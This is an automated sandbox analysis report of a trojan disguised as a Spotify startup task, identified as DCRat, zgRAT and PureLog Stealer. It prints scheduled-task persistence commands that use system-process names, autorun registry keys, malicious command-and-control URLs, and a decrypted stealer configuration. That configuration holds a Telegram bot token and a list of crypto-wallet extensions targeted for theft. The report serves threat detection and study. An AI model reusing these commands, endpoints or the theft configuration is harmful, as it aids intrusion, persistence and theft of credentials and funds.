Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SpotifyStartupTask.exe

Overview

General Information

Sample name:SpotifyStartupTask.exe
Analysis ID:1639975
MD5:9939a508443b50f3065506b3ef554c79
SHA1:5fae3003ff7f0930e51acad3d3f0cff25035c3ee
SHA256:2604fc4de987995cbc77b46bf86d49466fb65dd7dbee6b1b89fe343ef9b97617
Tags:exeuser-BastianHein
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SpotifyStartupTask.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\SpotifyStartupTask.exe" MD5: 9939A508443B50F3065506B3EF554C79)
    • schtasks.exe (PID: 5768 cmdline: schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 6 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1596 cmdline: schtasks.exe /create /tn "JNXeqwRJ1WmUZ" /sc ONLOGON /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1532 cmdline: schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 11 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 708 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 868 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9F0.tmp" "c:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 6908 cmdline: schtasks.exe /create /tn "dxLy2s6Ad" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5996 cmdline: schtasks.exe /create /tn "dxLy2s6A" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2740 cmdline: schtasks.exe /create /tn "dxLy2s6Ad" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\Update\dxLy2s6A.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4872 cmdline: schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJP" /sc MINUTE /mo 13 /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1532 cmdline: schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJ" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1528 cmdline: schtasks.exe /create /tn "PQ4HCWgZazguIsFyU1PhJP" /sc MINUTE /mo 11 /tr "'C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7048 cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Windows\DiagTrack\dwm.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7064 cmdline: schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\DiagTrack\dwm.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1692 cmdline: schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Windows\DiagTrack\dwm.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5776 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 992 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1528 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6928 cmdline: schtasks.exe /create /tn "SpotifyStartupTaskS" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1692 cmdline: schtasks.exe /create /tn "SpotifyStartupTask" /sc ONLOGON /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2228 cmdline: schtasks.exe /create /tn "SpotifyStartupTaskS" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\SpotifyStartupTask.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7528 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7584 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7604 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • dwm.exe (PID: 4352 cmdline: C:\Windows\DiagTrack\dwm.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • dwm.exe (PID: 2432 cmdline: C:\Windows\DiagTrack\dwm.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • dxLy2s6A.exe (PID: 992 cmdline: "C:\Program Files (x86)\google\Update\dxLy2s6A.exe" MD5: 9939A508443B50F3065506B3EF554C79)
  • dxLy2s6A.exe (PID: 7192 cmdline: "C:\Program Files (x86)\google\Update\dxLy2s6A.exe" MD5: 9939A508443B50F3065506B3EF554C79)
  • JNXeqwRJ1WmUZ.exe (PID: 7208 cmdline: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • JNXeqwRJ1WmUZ.exe (PID: 7232 cmdline: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • PQ4HCWgZazguIsFyU1PhJ.exe (PID: 7244 cmdline: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • PQ4HCWgZazguIsFyU1PhJ.exe (PID: 7264 cmdline: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • SpotifyStartupTask.exe (PID: 7280 cmdline: C:\Users\user\Desktop\SpotifyStartupTask.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • SpotifyStartupTask.exe (PID: 7292 cmdline: C:\Users\user\Desktop\SpotifyStartupTask.exe MD5: 9939A508443B50F3065506B3EF554C79)
  • winlogon.exe (PID: 7304 cmdline: "C:\Program Files\7-Zip\Lang\winlogon.exe" MD5: 9939A508443B50F3065506B3EF554C79)
  • winlogon.exe (PID: 7320 cmdline: "C:\Program Files\7-Zip\Lang\winlogon.exe" MD5: 9939A508443B50F3065506B3EF554C79)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SpotifyStartupTask.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    SpotifyStartupTask.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Windows\DiagTrack\dwm.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Windows\DiagTrack\dwm.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 4 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.SpotifyStartupTask.exe.600000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.SpotifyStartupTask.exe.600000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SpotifyStartupTask.exe, ProcessId: 6696, TargetFilename: C:\Program Files\7-Zip\Lang\winlogon.exe
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\DiagTrack\dwm.exe, CommandLine: C:\Windows\DiagTrack\dwm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\DiagTrack\dwm.exe, NewProcessName: C:\Windows\DiagTrack\dwm.exe, OriginalFileName: C:\Windows\DiagTrack\dwm.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\DiagTrack\dwm.exe, ProcessId: 4352, ProcessName: dwm.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SpotifyStartupTask.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JNXeqwRJ1WmUZ
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SpotifyStartupTask.exe, ProcessId: 6696, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SpotifyStartupTask.exe", ParentImage: C:\Users\user\Desktop\SpotifyStartupTask.exe, ParentProcessId: 6696, ParentProcessName: SpotifyStartupTask.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", ProcessId: 708, ProcessName: csc.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\SpotifyStartupTask.exe, ProcessId: 6696, TargetFilename: C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline
                              Sigma detected: Windows Processes Suspicious Parent Directory
                              Source: Process startedAuthor: vburov: Data: Command: "C:\Program Files\7-Zip\Lang\winlogon.exe", CommandLine: "C:\Program Files\7-Zip\Lang\winlogon.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\7-Zip\Lang\winlogon.exe, NewProcessName: C:\Program Files\7-Zip\Lang\winlogon.exe, OriginalFileName: C:\Program Files\7-Zip\Lang\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: "C:\Program Files\7-Zip\Lang\winlogon.exe", ProcessId: 7304, ProcessName: winlogon.exe

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SpotifyStartupTask.exe", ParentImage: C:\Users\user\Desktop\SpotifyStartupTask.exe, ParentProcessId: 6696, ParentProcessName: SpotifyStartupTask.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline", ProcessId: 708, ProcessName: csc.exe

                              Persistence and Installation Behavior

                              barindex
                              Sigma detected: Schedule system process
                              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SpotifyStartupTask.exe", ParentImage: C:\Users\user\Desktop\SpotifyStartupTask.exe, ParentProcessId: 6696, ParentProcessName: SpotifyStartupTask.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\winlogon.exe'" /f, ProcessId: 5776, ProcessName: schtasks.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-16T19:42:21.970604+010020480951A Network Trojan was detected192.168.2.649699104.21.33.7180TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-16T19:42:10.749406+010028033053Unknown Traffic192.168.2.64969434.117.59.81443TCP
                              2025-03-16T19:42:26.986057+010028033053Unknown Traffic192.168.2.64970934.117.59.81443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-16T19:42:11.879401+010018100091Potentially Bad Traffic192.168.2.649695149.154.167.220443TCP
                              2025-03-16T19:42:28.006474+010018100091Potentially Bad Traffic192.168.2.649711149.154.167.220443TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: SpotifyStartupTask.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://009383cm.nyashk.ru/Avira URL Cloud: Label: malware
                              Source: http://009383cm.nyashk.ruAvira URL Cloud: Label: malware
                              Source: http://009383cm.nyashk.ru/geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.phpAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Users\user\Desktop\vRRUHqel.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Windows\DiagTrack\dwm.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\Rlqiwetw.logAvira: detection malicious, Label: TR/Spy.xaclu
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\clyyMyKw.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\sMvnZGVS.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Users\user\Desktop\GFwKqCZT.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Users\user\Desktop\LWyBOcEb.logAvira: detection malicious, Label: TR/Spy.xaclu
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeReversingLabs: Detection: 66%
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeReversingLabs: Detection: 66%
                              Source: C:\Users\user\Desktop\DUQujoOa.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\GFwKqCZT.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\PMosVZFV.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\XUwHpYfn.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\YqxhFSUC.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\clyyMyKw.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\eKApnDyW.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\sMvnZGVS.logReversingLabs: Detection: 34%
                              Source: C:\Users\user\Desktop\vRRUHqel.logReversingLabs: Detection: 34%
                              Source: C:\Users\user\Desktop\wcHMhvIM.logReversingLabs: Detection: 25%
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeReversingLabs: Detection: 66%
                              Source: C:\Windows\DiagTrack\dwm.exeReversingLabs: Detection: 66%
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeReversingLabs: Detection: 66%
                              Multi AV Scanner detection for submitted file
                              Source: SpotifyStartupTask.exeVirustotal: Detection: 69%Perma Link
                              Source: SpotifyStartupTask.exeReversingLabs: Detection: 66%
                              Joe Sandbox ML detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Sample uses string decryption to hide its real strings
                              Source: 00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"TelegramNotifer":{"chatid":"6289890180","bottoken":"7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"}}
                              Source: 00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-lyFL9C96UdpRArWkuUmQ","0","????????+??????????","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                              Source: SpotifyStartupTask.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDirectory created: C:\Program Files\7-Zip\Lang\winlogon.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDirectory created: C:\Program Files\7-Zip\Lang\cc11b995f2a76dJump to behavior
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49692 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49695 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49706 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49711 version: TLS 1.2
                              Source: SpotifyStartupTask.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2482149517.000000001BB76000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: :C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.pdb source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000003348000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
